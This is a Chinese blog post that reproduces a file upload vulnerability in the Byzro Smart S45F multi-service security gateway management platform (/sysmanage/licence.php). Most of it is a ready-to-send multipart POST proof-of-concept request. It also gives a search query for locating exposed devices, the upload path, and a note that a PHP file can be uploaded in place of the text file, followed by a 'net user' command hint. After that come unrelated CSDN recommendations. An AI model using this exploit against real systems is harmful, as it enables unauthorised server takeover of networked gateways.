【漏洞复现】百卓Smart S45F网关智能管理平台/sysmanage/licence.php文件上传漏洞

最新推荐文章于 2024-06-14 09:22:46 发布
最新推荐文章于 2024-06-14 09:22:46 发布
阅读量370 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: php 网络安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60614981/article/details/133861337
版权

漏洞描述

北京百卓网络科技有限公司(以下简称百卓网络)是一家致力于打造下一代安全互联网的高新技术企业。Byzro Networks Smart S45F多业务安全网关智能管理平台存在文件上传漏洞。攻击者可以利用漏洞获取服务器权限或对系统造成业务影响。

搜索语句

title="PatrolFlow--管理平台"

漏洞详情

文件上传路径

/home/upload/readme.txt

poc

POST /sysmanage/licence.php HTTP/1.1
Host: localhost
Cookie: PHPSESSID=b11375c64210599a5bf9a99744783d48
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Referer: https://localhost/sysmanage/licence.php
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 705
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="ck"

radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="readme.txt"
Content-Type: application/octet-stream

123321
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hid_tftp_ip"


-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hid_ftp_ip"


-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

set
-----------------------------42328904123665875270630079328—

上传成功
在这里插入图片描述
查看上传文件
在这里插入图片描述确认文件存在,文件上传成功

<?php phpinfo() ?>

此处文件也可替换phpinfo.php

net user
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CVE-2023-4120:百智能Smart多业务安全智能管理平台SQL注入漏洞
薛定谔嘚喵博客
10-08 462
北京百智能Smart管理平台S40~S85F发漏洞漏洞编号CVE-2023-4120,级别为严重。此漏洞特征于管理组件文件 importhtml.php 的功能处理逻辑,对参数 sql 的参处过滤不严,导致任意SQL语句的执行,造成任意恶意文件的写入,该漏洞已向公众披露并可能被使用。
POC_百Smart多业务安全
LiBai'S BLOG
01-13 2233
Smart多业务安全 HTTP admin admin Administrator 指纹 "<title>Smart--管理平台</title>" POC name: poc-yaml-smart-admin-default-password level: 2 finger: | "smart-admin" in finger.name rules: - method: POST path: /login.php body: | .
POC_百Smart多业务安全_smart s45f多业务安全智能管理平台
2401_84558714的博客
05-13 744
对于从来没有接触过络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。对于从来没有接触过络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。费时一周整理的160+络安全面试题,金九银十,做络安全面试里的显眼包!对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!对于从来没有接触过络安全的同学,我们帮你准备了详细的。,大家跟着这个大的方向学习准没问题。
POC_百Smart多业务安全_smart s45f多业务安全智能管理平台(2)
2401_84558714的博客
05-13 856
本人从事路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发大家对一套完整的系统的络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
POC_百Smart多业务安全_smart s45f多业务安全智能管理平台(1)
2401_84558714的博客
05-13 535
本人从事路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发大家对一套完整的系统的络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
http://95u.free.fr/index.php,Electronic Software Distribution Service
热门推荐
weixin_39632291的博客
03-19 50万+
Content-Type: multipart/related; start=; boundary=----------OH5LlQ9dynBJGqR8E2AiMRContent-Location: https://software.pitt.edu/software/software.aspSubject: =?utf-8?Q?Electronic=20Software=20Distributi...
Struts2-045远程代码执行漏洞
jiji_king的博客
07-05 598
个人笔记
http://www.americanconcern.com/cl.html 45121
cuantang5347的博客
07-11 369
The insider said: Lindsay is being forced to live at home with Dina because she can't afford any other options a...
Science| 单体耦合纤维实无芯片纺织电子(纤维器件/智能织物/柔性可穿戴电子)
qq_34826938的博客
05-24 838
智能纺织品为将技术融入日常生活中提供了理想的平台。然而,目前的纺织电子系统往往依赖于刚性的硅元件,这也限制了无缝集成、能源效率和舒适性。由于缺乏动态能量转换载体,无芯片电子系统仍然面临着数字逻辑挑战。作者提出了一种无芯片的体耦合能量相互作用机制,用于环境电磁能量采集和通过单根纤维输无线信号。纤维本身实了无线视频数字交互,而不需要在纺织品上安装额外的芯片或电池。由于所有电子组件都合并在一个微型纤维中,这有助于可扩展的制造和与代织造技术的兼容性,从而实多功能和智能服装。我们提出了一种可能解决硅基纺织系统
S45 Invasive EEG investigation of insular cortex epilepsy.pdf
07-10
S45 Invasive EEG investigation of insular cortex epilepsy
D1461S45T 英飞凌芯片 INFINEON 中文版规格书手册.pdf
07-11
D1461S45T 英飞凌芯片 INFINEON 中文版规格书手册
D1381S45T 英飞凌芯片 INFINEON 中文版规格书手册.pdf
07-11
D1381S45T 英飞凌芯片 INFINEON 中文版规格书手册
D1251S45T 英飞凌芯片 INFINEON 中文版规格书手册.pdf
07-11
D1251S45T 英飞凌芯片 INFINEON 中文版规格书手册
D921S45T 英飞凌芯片 INFINEON 中文版规格书手册.pdf
07-11
D921S45T 英飞凌芯片 INFINEON 中文版规格书手册
PHP异常处理的最佳实践及常见问题解决
NatLindsay的博客
06-11 270
异常处理的基本原理是,当try块中的代码发生异常时,PHP会寻找匹配的catch块进行处理,如果没有找到对应的catch块,则异常会向上递直至被处理为止。PHP异常处理是在开发过程中至重要的一环,它能够帮助开发人员捕获和处理程序运行过程中的错误和异常情况,提高代码的稳定性和可靠性。在实际开发中,可能会遇到各种各样的异常处理问题,比如异常未被捕获、异常信息不清晰、异常处理性能问题等。合理地使用自定义异常类能够使异常处理更加灵活和规范化,有助于统一异常信息和错误码,提高代码的可维护性和可读性。
源码编译安装LAMP
潇的博客
06-12 831
LAMP 架构是目前成熟的企业站应用模式之一,指的是协同工作的一整套系统和相软件,能够提供动态Web站点服务及其应用开发环境。LAMP是一个缩写词,具体包括Linux操作系统、Apache站服务器、MySQL数据库服务器、PHP(或Perl、Python)页编程语言。本章将以源码编译的方式搭建LAMP环境,能够满足企业定制化的需求。在构建LAMP平台时,各组件的安装顺序依次为Linux、Apache、MySQL、PHP。其中Apache和MySQL的安装并没有严格的顺序;
无回显XXE攻击:隐秘的数据泄露技术
最新发布
weixin_43822401的博客
06-14 371
无回显XXE攻击是一种隐蔽的数据泄露手段,攻击者可以在不引起目标服务器注意的情况下获取敏感信息。了解这种攻击的原理和防御策略对于保护络安全至重要。通过本文的介绍,希望读者能够提高对无回显XXE攻击的认识,并采取相应的防护措施。
软考初级管理员_07_络单选题
2301_80961833的博客
06-12 909
部分主机无法与该DHCP服务器正常通信,这些主机客户端系统自动生成了169.254.0.0范围内的地址。部分主机无法与该DHCP服务器正常通信,这些主机客户端系统自动生成了127.254.0.0范围内的地址。通过ARP协议可以获取目的端的MAC地址和UUID的地址。你必须先接入Internet,别人才可以给你发送电子邮件。只要你的E-Mai 地址有效,别人就可以给你发送电子邮件。你只有打开了自己的计算机,别人才可以给你发送电子邮件。于虚拟局域,下面的描述中错误的是()。
smart s45f多业务安全智能管理平台
09-01
smart s45f多业务安全智能管理平台是一种为企业提供全面、智能、安全管理多业务络的解决方案。该平台结合了先进的技术和功能,旨在提供高效的管理和安全保护。 首先,该平台具有智能化的管理功能。它能够...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值